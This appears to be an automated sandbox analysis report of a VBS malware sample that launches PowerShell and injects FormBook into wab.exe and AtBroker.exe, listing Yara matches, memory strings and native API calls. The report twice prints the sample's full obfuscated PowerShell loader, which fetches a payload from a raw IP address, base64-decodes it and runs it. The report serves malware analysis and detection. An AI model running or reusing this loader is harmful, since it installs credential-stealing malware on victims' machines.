Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2624324723.000001CB01389000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://repository.tsp.zetes.com0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_4268.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5328.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4268, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5328, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Patria.ShellExecute("P" & Bankbekendtgrelsen & ".e" + "xe", Minutterne, "", "", Nonadverbially)

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2992
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2992
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2992	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2992	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227435C0 NtCreateMutant,LdrInitializeThunk,	8_2_227435C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742B60 NtClose,LdrInitializeThunk,	8_2_22742B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_22742C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_22742DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22744340 NtSetContextThread,	8_2_22744340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22743010 NtOpenDirectoryObject,	8_2_22743010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22743090 NtSetValueKey,	8_2_22743090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22744650 NtSuspendThread,	8_2_22744650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742AF0 NtWriteFile,	8_2_22742AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742AD0 NtReadFile,	8_2_22742AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742AB0 NtWaitForSingleObject,	8_2_22742AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742BF0 NtAllocateVirtualMemory,	8_2_22742BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742BE0 NtQueryValueKey,	8_2_22742BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742BA0 NtEnumerateValueKey,	8_2_22742BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742B80 NtQueryInformationFile,	8_2_22742B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227439B0 NtGetContextThread,	8_2_227439B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742E30 NtWriteVirtualMemory,	8_2_22742E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742EE0 NtQueueApcThread,	8_2_22742EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742EA0 NtAdjustPrivilegesToken,	8_2_22742EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742E80 NtReadVirtualMemory,	8_2_22742E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742F60 NtCreateProcessEx,	8_2_22742F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742F30 NtCreateSection,	8_2_22742F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742FE0 NtCreateFile,	8_2_22742FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742FB0 NtResumeThread,	8_2_22742FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742FA0 NtQuerySection,	8_2_22742FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742F90 NtProtectVirtualMemory,	8_2_22742F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742C60 NtCreateKey,	8_2_22742C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742C00 NtQueryInformationProcess,	8_2_22742C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742CF0 NtOpenProcess,	8_2_22742CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742CC0 NtQueryVirtualMemory,	8_2_22742CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742CA0 NtQueryInformationToken,	8_2_22742CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22743D70 NtOpenThread,	8_2_22743D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742D30 NtUnmapViewOfSection,	8_2_22742D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22743D10 NtOpenProcessToken,	8_2_22743D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742D10 NtMapViewOfSection,	8_2_22742D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742D00 NtSetInformationFile,	8_2_22742D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742DD0 NtDelayExecution,	8_2_22742DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22742DB0 NtEnumerateKey,	8_2_22742DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D035C0 NtCreateMutant,LdrInitializeThunk,	11_2_04D035C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D04650 NtSuspendThread,LdrInitializeThunk,	11_2_04D04650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D03090 NtSetValueKey,LdrInitializeThunk,	11_2_04D03090
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D04340 NtSetContextThread,LdrInitializeThunk,	11_2_04D04340
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_04D02CA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04D02C70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02C60 NtCreateKey,LdrInitializeThunk,	11_2_04D02C60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02DD0 NtDelayExecution,LdrInitializeThunk,	11_2_04D02DD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04D02DF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_04D02D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_04D02D30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_04D02EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_04D02E80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02FE0 NtCreateFile,LdrInitializeThunk,	11_2_04D02FE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02FB0 NtResumeThread,LdrInitializeThunk,	11_2_04D02FB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02F30 NtCreateSection,LdrInitializeThunk,	11_2_04D02F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D039B0 NtGetContextThread,LdrInitializeThunk,	11_2_04D039B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02AD0 NtReadFile,LdrInitializeThunk,	11_2_04D02AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02AF0 NtWriteFile,LdrInitializeThunk,	11_2_04D02AF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04D02BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_04D02BE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_04D02BA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02B60 NtClose,LdrInitializeThunk,	11_2_04D02B60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D03010 NtOpenDirectoryObject,	11_2_04D03010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02CC0 NtQueryVirtualMemory,	11_2_04D02CC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02CF0 NtOpenProcess,	11_2_04D02CF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02C00 NtQueryInformationProcess,	11_2_04D02C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02DB0 NtEnumerateKey,	11_2_04D02DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D03D70 NtOpenThread,	11_2_04D03D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D03D10 NtOpenProcessToken,	11_2_04D03D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02D00 NtSetInformationFile,	11_2_04D02D00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02EA0 NtAdjustPrivilegesToken,	11_2_04D02EA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02E30 NtWriteVirtualMemory,	11_2_04D02E30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02F90 NtProtectVirtualMemory,	11_2_04D02F90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02FA0 NtQuerySection,	11_2_04D02FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02F60 NtCreateProcessEx,	11_2_04D02F60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02AB0 NtWaitForSingleObject,	11_2_04D02AB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D02B80 NtQueryInformationFile,	11_2_04D02B80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CF8AD0 NtReadFile,	11_2_02CF8AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CF8B90 NtDeleteFile,	11_2_02CF8B90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CF89A0 NtCreateFile,	11_2_02CF89A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CF8C10 NtClose,	11_2_02CF8C10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CF8D50 NtAllocateVirtualMemory,	11_2_02CF8D50

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F2CAD6	2_2_00007FF848F2CAD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F2D882	2_2_00007FF848F2D882
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07ACC258	5_2_07ACC258
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227B0274	8_2_227B0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227B12ED	8_2_227B12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2272B2C0	8_2_2272B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227902C0	8_2_227902C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227152A0	8_2_227152A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_226FD34C	8_2_226FD34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CA352	8_2_227CA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C132D	8_2_227C132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2271E3F0	8_2_2271E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227D03E6	8_2_227D03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2275739A	8_2_2275739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C70E9	8_2_227C70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CF0E0	8_2_227CF0E0
